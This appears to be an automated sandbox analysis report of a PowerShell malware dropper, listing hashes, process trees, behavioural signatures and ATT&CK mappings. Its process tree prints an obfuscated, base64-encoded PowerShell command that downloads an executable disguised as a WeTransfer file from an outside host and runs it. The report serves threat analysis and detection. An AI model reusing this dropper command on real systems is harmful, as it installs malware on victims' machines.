0ab6b8351024ac1bd5a7852563a5039135e32c68b528e5d1061722f5d3650999

General

Target

PS.ps1
Size

490B
MD5

a09dc5b1b69075b7b82d656cc0766e30
SHA1

a3a060e7ab02cecfdd115ab415da947146e37193
SHA256

0ab6b8351024ac1bd5a7852563a5039135e32c68b528e5d1061722f5d3650999
SHA512

49dc33d8b67ab387fe2859325cfc47b77f62ba745ca91b0104f23ca3162c4071d3c85e04c119a09cc0ca31a30545a81b1e8ae173f4ccfba5bf4af45ada4d68df

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 1340 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

wetransfer64.exe

pid process

784 wetransfer64.exe

flow	pid	process
6	1340	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs

Processes:

wetransfer64.exe

pid	process
784	wetransfer64.exe
784	wetransfer64.exe
784	wetransfer64.exe
784	wetransfer64.exe
784	wetransfer64.exe
784	wetransfer64.exe
784	wetransfer64.exe
784	wetransfer64.exe
784	wetransfer64.exe
784	wetransfer64.exe
784	wetransfer64.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

856 timeout.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

wetransfer64.exe

pid process

784 wetransfer64.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exewetransfer64.exe

pid process

1776 powershell.exe
1340 powershell.exe
1340 powershell.exe
784 wetransfer64.exe
784 wetransfer64.exe
784 wetransfer64.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewetransfer64.exe

description pid process

Token: SeDebugPrivilege 1776 powershell.exe
Token: SeDebugPrivilege 1340 powershell.exe
Token: SeDebugPrivilege 784 wetransfer64.exe

pid	process
856	timeout.exe

pid	process
1776	powershell.exe
1340	powershell.exe
1340	powershell.exe
784	wetransfer64.exe
784	wetransfer64.exe
784	wetransfer64.exe

description	pid	process
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeDebugPrivilege	784	wetransfer64.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

powershell.exepowershell.execmd.exewetransfer64.execmd.exe

description	pid	process	target process
PID 1776 wrote to memory of 1340	1776	powershell.exe	powershell.exe
PID 1776 wrote to memory of 1340	1776	powershell.exe	powershell.exe
PID 1776 wrote to memory of 1340	1776	powershell.exe	powershell.exe
PID 1340 wrote to memory of 748	1340	powershell.exe	cmd.exe
PID 1340 wrote to memory of 748	1340	powershell.exe	cmd.exe
PID 1340 wrote to memory of 748	1340	powershell.exe	cmd.exe
PID 748 wrote to memory of 784	748	cmd.exe	wetransfer64.exe
PID 748 wrote to memory of 784	748	cmd.exe	wetransfer64.exe
PID 748 wrote to memory of 784	748	cmd.exe	wetransfer64.exe
PID 748 wrote to memory of 784	748	cmd.exe	wetransfer64.exe
PID 784 wrote to memory of 1640	784	wetransfer64.exe	cmd.exe
PID 784 wrote to memory of 1640	784	wetransfer64.exe	cmd.exe
PID 784 wrote to memory of 1640	784	wetransfer64.exe	cmd.exe
PID 784 wrote to memory of 1640	784	wetransfer64.exe	cmd.exe
PID 1640 wrote to memory of 856	1640	cmd.exe	timeout.exe
PID 1640 wrote to memory of 856	1640	cmd.exe	timeout.exe
PID 1640 wrote to memory of 856	1640	cmd.exe	timeout.exe
PID 1640 wrote to memory of 856	1640	cmd.exe	timeout.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\PS.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYpass -nOP -W 1 -EC IAAJAAkAIAB3AEcARQBUAAkACQAJAAkAIAAdIGgAdAB0AHAAOgAvAC8AdwBlAHQAcgBhAG4AcwBmAGUAcgAtAGMAbwBtAC4AZAB1AGMAawBkAG4AcwAuAG8AcgBnAC8AYQA0ADQAOAA5ADEAYQBkAC8AOQAxADEALgBlAHgAZQAdIAkACQAJACAACQAtAG8AdQBUAEYASQBsAEUACQAgAAkAIAAdICQARQBuAHYAOgB0AEUAbQBwAFwAdwBlAHQAcgBhAG4AcwBmAGUAcgA2ADQALgBlAHgAZQAdICAAIAAgADsAIAAJAAkACQBDAG0AZAAgAAkACQAgAC8AYwAgAAkACQAdICQARQBuAFYAOgB0AGUATQBQAFwAdwBlAHQAcgBhAG4AcwBmAGUAcgA2ADQALgBlAHgAZQAdIA==
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1340

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\wetransfer64.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:748

C:\Users\Admin\AppData\Local\Temp\wetransfer64.exe
C:\Users\Admin\AppData\Local\Temp\wetransfer64.exe
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:784

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
5⤵
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\SysWOW64\timeout.exe
timeout 1
6⤵
- Delays execution with timeout.exe
PID:856

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\wetransfer64.exe
MD5
59df63df48d34fc9d3d9be42e76f6794

SHA1
853952f4a4bfdc0ea2885c766e544370489e683a

SHA256
d44d20adff5359504bb9aeeca5fc1ac855aa374eea0921b0990a41b8d0d777da

SHA512
63b58d35066d11b9e37547dc1dfae084fc679c7354f7623e5e93646a4e897c82ae2d4ef7550b9157c360d217e897d90cbd0e1d1274b308e39d8da26083d08c04

Download Submit
C:\Users\Admin\AppData\Local\Temp\wetransfer64.exe
MD5
59df63df48d34fc9d3d9be42e76f6794

SHA1
853952f4a4bfdc0ea2885c766e544370489e683a

SHA256
d44d20adff5359504bb9aeeca5fc1ac855aa374eea0921b0990a41b8d0d777da

SHA512
63b58d35066d11b9e37547dc1dfae084fc679c7354f7623e5e93646a4e897c82ae2d4ef7550b9157c360d217e897d90cbd0e1d1274b308e39d8da26083d08c04

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
48a1c9605cace5e1a9514c28ab0e4c02

SHA1
1a866615be3b39ccacc123a0617f6ec09ebb7cc3

SHA256
95c7dcfc8493056445fb1cf00986a9b219c4d7186e91ecfdb901222d9ee19247

SHA512
deb383ba7f8777d2a823d7efeaadb901b3fd2e24c06a1c12b41c3be68eba40b217841935747c7647c60dfa5a8952e77fa3e1a3fcf4b2422f20dc57faeba8dae1

Download Submit
memory/748-76-0x0000000000000000-mapping.dmp

Download
memory/784-85-0x0000000006150000-0x0000000006151000-memory.dmp

Filesize
4KB

Download
memory/784-82-0x00000000001E0000-0x000000000021D000-memory.dmp

Filesize
244KB

Download
memory/784-80-0x0000000000F20000-0x0000000000F21000-memory.dmp

Filesize
4KB

Download
memory/784-78-0x0000000000000000-mapping.dmp

Download
memory/856-84-0x0000000000000000-mapping.dmp

Download
memory/1340-74-0x000000001AAA4000-0x000000001AAA6000-memory.dmp

Filesize
8KB

Download
memory/1340-75-0x000000001B7A0000-0x000000001B7A1000-memory.dmp

Filesize
4KB

Download
memory/1340-73-0x000000001AAA0000-0x000000001AAA2000-memory.dmp

Filesize
8KB

Download
memory/1340-66-0x0000000000000000-mapping.dmp

Download
memory/1640-83-0x0000000000000000-mapping.dmp

Download
memory/1776-59-0x000007FEFBB31000-0x000007FEFBB33000-memory.dmp

Filesize
8KB

Download
memory/1776-65-0x0000000001E30000-0x0000000001E31000-memory.dmp

Filesize
4KB

Download
memory/1776-64-0x000000001ACC4000-0x000000001ACC6000-memory.dmp

Filesize
8KB

Download
memory/1776-63-0x000000001ACC0000-0x000000001ACC2000-memory.dmp

Filesize
8KB

Download
memory/1776-62-0x0000000002380000-0x0000000002381000-memory.dmp

Filesize
4KB

Download
memory/1776-61-0x000000001AD40000-0x000000001AD41000-memory.dmp

Filesize
4KB

Download
memory/1776-60-0x0000000001FF0000-0x0000000001FF1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing